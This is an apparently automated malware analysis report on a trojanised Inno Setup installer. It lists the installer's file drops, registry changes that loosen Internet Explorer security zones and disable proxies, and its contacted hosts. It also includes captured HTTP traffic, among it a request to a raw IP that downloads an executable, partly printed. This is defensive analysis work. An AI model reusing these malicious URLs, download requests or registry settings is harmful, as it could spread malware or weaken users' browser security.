Installer.Win32.InnoSetup.2_9bd659f802

by malwarelabrobot on May 3rd, 2016 in Malware Descriptions.

Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 9bd659f802479a9bf3ccf7545ef9a1e4
SHA1: 41cd20bab6628573148e52c30844357ca5d7745e
SHA256: b09ddb4e12cad384e8be48365ce6c205bd1c93a37ef85a5975d8d7c1677c9ca4
SSDeep: 24576:qiTAj2NdhIAtyY5pXKBOTH/XXvfmUDDhjqUPhZHZxWPY4h/2:qiMG9tyoxA8HfnmUPhjRbZxT4h
Size: 1010192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: adsafiliados
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit

Summary:

Installer. An installation package.

Payload

No specific payload has been found.

Process activity

The Installer creates the following process(es):
No processes have been created.
The Installer injects its code into the following process(es):

%original file name%.exe:1676

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1676 makes changes in the file system.
The Installer creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo4[1].jpg (1041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Pause_Button.png (577 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Installer deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (0 bytes)

Registry activity

The process %original file name%.exe:1676 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 77 53 67 3C 22 1E 2B EC 1F 37 5D D5 EF 37 37"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Installer modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Installer modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Installer deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
cff4e84c73ced3564f31f78eba726d61	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: adsafiliados
Product Name: Installer Setup
Product Version: 1.0.5.a0.1_54944
Legal Copyright: adsafiliados
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.5.a0.1_54944
File Description: Installer Setup
Comments: This installation was built with Inno Setup.
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	40240	40448	4.64999	dbda5ee849ef82a713855f811e7bfc14
DATA	45056	592	1024	1.90742	1ee71d84f1c77af85f1f5c278f880572
BSS	49152	3724	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	53248	2384	2560	3.07115	bb5485bf968b970e5ea81292af2acdba
.tls	57344	8	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	61440	24	512	0.14174	9ba824905bf9c7922b6fc87a38b74366
.reloc	65536	2244	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	69632	11264	11264	3.10173	85e26c316dd351fa3b841914fb7ded69

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 25
da572766f44e7b5b01f230f184e2be6b
961c4435451cc147d6d3bfd59f8d4624
e6a69a7ba36c7be2ff8ca7e7e79e4038
28422dba23ed1f0a4e7be424f69bfc09
20af91ce088b16d260ed76a2614037b0
5c58c121061e8f79f3885326d8c5cb29
f1103ef51e63250cd835b8ad507dd24c
d0d8cec2d646fa7a0fb6c79d44e3b960
f762441fab5467efeabfaea3685f1806
6899505489192a5a9df7b30ee0babfaf
dc5a034db8ab7049dc5f37a17ebcb9d9
8ba398b18d09d8415a60149a70c535bd
eaeed4183ff17edc4384e353f43a76e1
a7a4010bdab7a0a66b95cb20b9fa0c3d
b3d549f05a832980a905d1b3a9f2a5ae
415bf2b54ca511831edeb9c21e2645e4
296174c8438a132b37a6b89d2dd61a50
4954d37f1446ae2dca81f1695d18190f
b162d3e830ee3694a36cf947f0d77709
1d5a622fedabcbd02b2677486b01fd4a
992848a79a13ecc7b491b8723311b73c
941bc0a52a496fe0ee77cece39d37d45
0869e43da1d44f256fa7fdf02f5743ad
c088309e24bea1c8893ed8b009d1e3ec
7f1ba36097afd10c60a316a734514982

URLs

URL	IP
hxxp://info.fodidodasal.com/?v=1.03&c=4dda1ae4&at=86346066&cntr=0	54.154.229.88
hxxp://ad5.adswarez.com/downloadimage/1264/13/d99394816486d094825965657734c00d/logo4.png?logotipo=automatico&uo=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&nada=true	104.28.17.74
hxxp://os.fodidodasal.com/adsafiliados/?v=6.0&c=325067414&t=834562	52.31.134.147
hxxp://rp.fodidodasal.com/?v=2.0&subver=6.21&pcrc=745675320	54.247.170.90
hxxp://rp.fodidodasal.com/?v=2.0&subver=6.21&pcrc=198775596	54.247.170.90
hxxp://ad5.adswarez.com/comp/1264/13/gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI.exe?plataforma=c1&&uo=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&ud=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html	104.28.17.74
hxxp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em PortuguÃªs-BR (32 e 64 Bits) - PH Downs
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=198775596
hxxp://os.Fodidodasal.com/adsafiliados/?v=6.0&c=325067414&t=834562
hxxp://info.Fodidodasal.com/?v=1.03&c=4dda1ae4&at=86346066&cntr=0
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=745675320
img.fodidodasal.com	146.185.27.45

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /adsafiliados/?v=6.0&c=325067414&t=834562 HTTP/1.1

Accept: */*

Host: os.Fodidodasal.com

User-Agent: ICAS

Content-Length: 1232

Cache-Control: no-cache

.I..~...$$........FI ..B.s.8...H.,..1...
.w.J.......u3.2.;....O0,.b.5..S.eGw..6....T... .<l..Qvo.Q...U.arE.w..;......[2....0.d.^q...J...

.Rl)"..fq...q}..>...c.. an.>.7.0.P$i.>M m!.....V..X....~.^JHe.4..S..`gC......#.............@-~.-c....7............%.c..Id...Fa..C..B.8../[email protected]{g....M.T...a...H......`..?...lA.[N..g...iMK.s.b0z..A

.j.s.......F1.yf......z.......l..w.c.
.].].f..2....vW....a...?.,....M=
.Y..

....." ....b...n..p.%....qe...z:[email protected].'.y.,...-....M..4z

~&...r.........U.O-.\....R.>.3B..J."l.^[v....\....... U....S#v...b..Yd..d/..Vj.......p.G....<..O.V.._.L'..Ml...D..<2......WM.D..x..H.e.Z5..^m.u..T.N.....^.^....~..0$.W.t.z.h...3P.
j..u.S....qEx.|..SZ....Xd..r;0.U. ..5....h^.__1...].|...{.bH.. .|...Af~..*..].nB..c....(N(..#x{..8L.g.4..H...U...l.........|..B'a..a...-).
2..{}.k...V.9......Zy...nvx....CX.pK

....Kd..C ./.r...]..0...J....M.G..1....!.........G.....3.<...3h I..%...8....c...1KU8..f.....
}F.cPR>[email protected]`ZH..{........m. ......g=.......~......W.0'hD|A. ...al;.W...b.~.....s..P..u.sm.#.gn.o.c...&

..m..&..;.y@....~|..,.8-'$..El..Jk....M.......{..).].."..SJ.^......
".*.vv..`..W.E.......A.......l...R3P..{@

RUK.....5....._X
??U....2.^.......6h-....w
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-Type: text/plain

Date: Mon, 02 May 2016 04:59:26 GMT

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Server: nginx

X-ICSCT-CC: UA

X-ICSCT-CITY: Kharkiv

X-ICSCT-GICSET: global13712aICBA

X-ICSCT-IP: 194.242.96.218

X-ICSCT-SERVER-NAME: ads.slave-131-prod-eu-west-1c-7202a8fa

X-ICSCT-TIMESTAMP: 20160501235926346

X-ICSCT-VERSION: 1.3.1

X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a

X-Robots-Tag: none

transfer-encoding: chunked

Connection: keep-alive
3a2..U.H.J[@.JX...(#>.}..-.J../R...r.?.V.}R.~.yI......\B...U..;A...
Y67.J...T......G>..%0? ..q/..S....r5.......j..d[$.........!...)....
.....}K}.2.Q.....3.....4......5.,h..N.\e..H.......JP................(.
...71U.2.q..A.:.|q&.|..2..=/..l.R.#w.E.IX...$.<..G..4...H}.o. i).L.
.<L.>.:....U.0....&..^...)....A..E..2......T...)..5.S....Gw..).8
..xBM.....v..P"...=1;^x..4./:....<C.l.....U..).d..e../[email protected]
......(.\s}...j.....u_d....."_i.H..........:......Y../..P........z/...
0.....6>.?......V.a.x.....^t`.z6_........5.b.1........,q.%b..zL..e.
/.}...8n.....Q..h=....5............4....?.}......(5.o.....5...........
....0....4.....X.L(........8....}!..x..gw....t"z}.......3O.......w....
... ...T.6$.......u......X.......H......?.......".....-......:.......\
.......l5....d.4.:.(........5.....)........l.>,.....E....$e...yk.._
<...I|...TfAZ$.g/c[.0.d..........H...k......M.........C.....nh.~.D.
,.V.u.<..Yt.w..4..R..6...}%[email protected].....$.$.
...%..x.th.M....$Z.<...H.ZI...R..h0...(.4...:.T.$....g..I......d..~
A.0~.L3.....E,..=...$....F..;..Z15_,.....W.....KP...~az4..fD...9......
U;..!P=..L......XI.QU.....X..i$.... .MWGt..[.......l..$...>.^.gd...
D..a...>...a.4.=.....S`N37\.........-"[email protected]..`..{...p......G
.0.E].6p.J...s..l..h..,Yq7...t;boq.S6.6eD.".)(k..f...5!.......R.F....t
..!..Lh.IE!q....n...pp.......(.A> ?..).......p....$../@O.,...P.....
FF...;B...S. ..........x..C..#y...N....G.....E~hM..~0...M....*.3....3&
lt;..mW...{.C.I..B........z.H..}...8.D....0....9.o..........-..\..<<< skipped >>>

POST /?v=1.03&c=4dda1ae4&at=86346066&cntr=0 HTTP/1.1

Accept: */*

Host: info.Fodidodasal.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 172

Cache-Control: no-cache

6l7GU7LYt04pVHc/00d7Jmrpn1tMNl72DF45Dyd1Ek32k /ReSZh  EZcO6iFesAKbPDUzJBKgPIbhzx9qgYGDw8OQJWdh3L vh4YX5Vq2Y2iXS7ZeACmfaQ9dpBAGIGeBAN5ZDioG u8AgiH85cu/m38AETLu5pIjyMbv4TI7U=
HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Date: Mon, 02 May 2016 04:59:25 GMT

Content-Length: 2176

Connection: keep-alive

QvJ5xIEkV9Z/FFmDlcwMSQIKu6BUkU4J0RioqehpVC6ry5PpxymFaYSDthf FoSY9XbetR
mgQtURPHIQHbbCIGDI3QuuWzTLdiMVZBM4EoroPJ0R6kXFGMQx9IBNIdGrfFC 4 ecocon
1E9C/ggtnItl/Mjvu1aGWlNS2vVcrzXoUvLYVx4xVWM6i/Ce73jairNaWhW2rkhpZ7m3v4
aBtv4CI yoBgOesqTRsFcgTrsQGjLMWbTXOEkk2y2FtxUB1DsWITpJVq5RHdTZ6NhFw6fw
sM2b2fvU6RzQSzuygLJGN3CwJnR/cXaK7x/XdAYZVpTQA5oCG5jezZmue4EIXAwZyIJr74
6xz0O yGr7p2ZA3M2YjPWN1IMrXsFlMZP9u GqhfpgHszOd2JR1TGlCzOH4HGhm4Kwfu3J
Jdj6ZVaHylrm4vDzjoQcr2U4eYl82QHKHy/MFLBUMrKdzXlHcThbzj68oHlKT5d SJz6UN
BEJS8F24NCt/H7b6fT Bl9ZLG8zzwhUhwpHpCQIBUl3uEVENpEXKa1RFGpanWvSiMu3eE6
uvThvy4un SlniXRL7VbF3/qGTJVSFmsiYSQKrIwcleBon lok9kwxi2 K96SE5tMTX4BF
urP84X gP8KjIE/VxV6mlm27spRXYBw2HRTNeXbwLb63pA9eQyUvNjkfVhKwjw9LrUitpo
kUUQCR2LYUJJN1MVh8ObFfTsFWE6WcjDjphl6bqQnn xnQHIgtNfOapxSpl1UmKuiF7HYB
SACwngnIgnXVDhul1R6kqVU9gBa99gZ4WfFWKJjx8X8 XgwXf Y2oVgh76IBhAOeOOkdY1
/oy6RKl5HBCRbKz9qqFbyXAkYqKQ1jveoJgCryoUFW1m VtD8NMtox5YSAz19dIvRVT4at
T1PAb9SwBO7TMaIC0UsQAg7t iHvBhgxZEXiLfQfhbPJRs6noPoEz/Q/MJLcGfFOvjXjY3
iPNtbiC6Q4JvRlXlQ8fe YPY2ckCeCGwJd/GAqRUIvLidKg6c28Pcf1gj9jcXIREevzfIe
hUi5YgdTNJIAmbkh/ gbvFyAQ7CUwUEfmZ6lHM2kG2kstkQRn/ggtCT/4cxOsuHiTjDupj
klozz/2uTBbaM0o A2WU9DbKSmgT9de4Lx2VJSvQMR8s81WzzLkJ5uRy87WaATewSKa5Nf
CO2OmNIfO4WtrRifopoOfHs5zgHBCkuCZU4lT5OCfC1K1mW FZZw56JqIQv834OQeAIY3W
3PywNxpXObEnSvvu4CUHVtE0EGmwqVeGpR3lu3s48MDv28Fh UMuBS/ExvYUyKvp3qK08N
QEBAzlXYo5ikkUdump8LtaGdQ4pyxdBPKP0njKnPwf6lotsKmLIeeHIIk2gbXLYxDTK525
nLI7Frez6SPXpQvP2rbONvnAiuk 9mHK6xQW3V257AZg//FNqUjD0pCbK9ovpQBo0EyNhr
Kl5o 2RePBQrGjqFGiet6DnzutaoRCRcpJuonh2Q8P7hFOEXDDEV0ZLvStqIIKhSSs

<<< skipped >>>

GET /?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em PortuguÃªs-BR (32 e 64 Bits) - PH Downs HTTP/1.1

Range: bytes=0-60722

Accept: */*

Host: 162.243.100.13

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 02 May 2016 04:59:29 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.3

Content-Disposition: attachment; filename=pixel.exe

Content-Description: File Transfer

Content-Length: 60723

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/force-download

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
.......@..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
[email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

POST /?v=2.0&subver=6.21&pcrc=745675320 HTTP/1.1

Accept: */*

Host: rp.Fodidodasal.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 2368

Cache-Control: no-cache

...4.....>.K..~.........u..i.Z..*...C3E

....x".....E.H\!oZ...;l2.b.E....m.rB....P.E.Bm.S..*.J.7-........:...T.`.U..2s!..L..c..h......n.e..>3j.Q..^..Z...wB..t...t...w.{.......x.4L.\,..I..Y$.....h...K.5....R...-.....c.wC.F

....u..l<...9.8wUr l.j..U....UjoM.......{Z. |{.......M.{.M.}...utA....d8...G....LTn.W;M2..D"SE4..QR..`.\.h9d96....r....5...'..~...V.V!.&gCF.n.....k...?...k.E.....4..M0KS&.3.0.....N.....6SZ..t..........!..Y...F...9......R...Vu..`J...t;7D*..}...N.....Om..3..Wn.XZ..Ep.p....9...C..A....Q..i..t...=z...0.k.u....u.{.......R.L#...Q.E..D..2.......q..c...7...e....\...@. .2.-......i....`H.N.3Y..r.....h.......V......bO].....`..Wy.....Pr./%....!....n4.3'V.u'..,.N....k).H..x...4?.^C:/}...h.0e.....vy...N...m.E.:...".......>.....sU}E..:..;...d@[email protected]@.......7..q.k ...F.J&n.a........W...%.....j..c.,9^9.....

.p.b1....V..o........c@........../E.73...5..1..-z.........t/=k....`_OM9.;...........[email protected] ..pZ..;.|.k`..}1...R".G.OV......2g%...|.u.....V..J........}.__.d..|.....2...2\;x$.......zi).>...-_T..U....%8....c.E..)......_.D.....lD..g.....,A.!=....f..U.-.kb......:.{.....).9..N.*..p...._)..Utk..\.....j$.#`..!.u...A.CJ.#(...u.....0.D..X/.21oQ....U3.......[.c,.MU...h..'[]..yv.L.. ..s|.2@"t.,.. .3......Q@?P...K....7K.A..Z..r...B.4..8f..O..NF...N.=.

..x_...s.2.M..5
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Mon, 02 May 2016 04:59:26 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Mon
, 02 May 2016 04:59:26 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE..

POST /?v=2.0&subver=6.21&pcrc=198775596 HTTP/1.1

Accept: */*

Host: rp.Fodidodasal.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1824

Cache-Control: no-cache

...3E.Q)_l.y...KJ..H ..d"..4....YC....$H..K.....m.*.2A.}.s.P...*..y....`-...w..r.d.......#.............V>$.c....1v.b..v.&-.c....>..3B../G..fmI.z.Q..<....Y.X.;.... .fO..0.'.!..5<.@..\.X.r......!....f.0.f^kdn....Q>..... r....x..mS.:}B.r.cX.T.&.l_..,.$
;f.4..V.r..S.^..*3...|...=.....w.]....D

 ,...x.d.v..{S..&4f...K.E.i..q5.....&<.(]..:.un..5.
.6FDRw...H.QG..y
G]..o3..

L.~C..`zu..9....=........}\..j..Y...G...P.Ot'8C..

.x.{r?............b..<X......>..-..-X9. .f..E..|xZ""..8.&....f...D......!.RO...*[email protected].?.zF.|....y.LP..O...h..b6:.,................gm-..a...:....../..
...6.^......K.....j~J;Z....8A.....w.d..g..cjW. .y..t-...T.r..8....G.t.1Q..zU2.\..y..i`q

S..|.......2..x..*.-.{.*.
W..c.1k.7.Als.EDW.3..=.....

H. \...q2R.(...o....F7...|....a..7....FzC..g.|..0....wY....S....b..T......G...7O.yu&.B.]=....WE.sk...h.q,o....ZRd
<[email protected].].:l...{%..\.F.:():......(L...S<q.....p>p..........\..j?.ys../....l..M.:wG.....F..X|.8=p.iN).....6.S.$..'..e.......'.R..z>.f[

.t

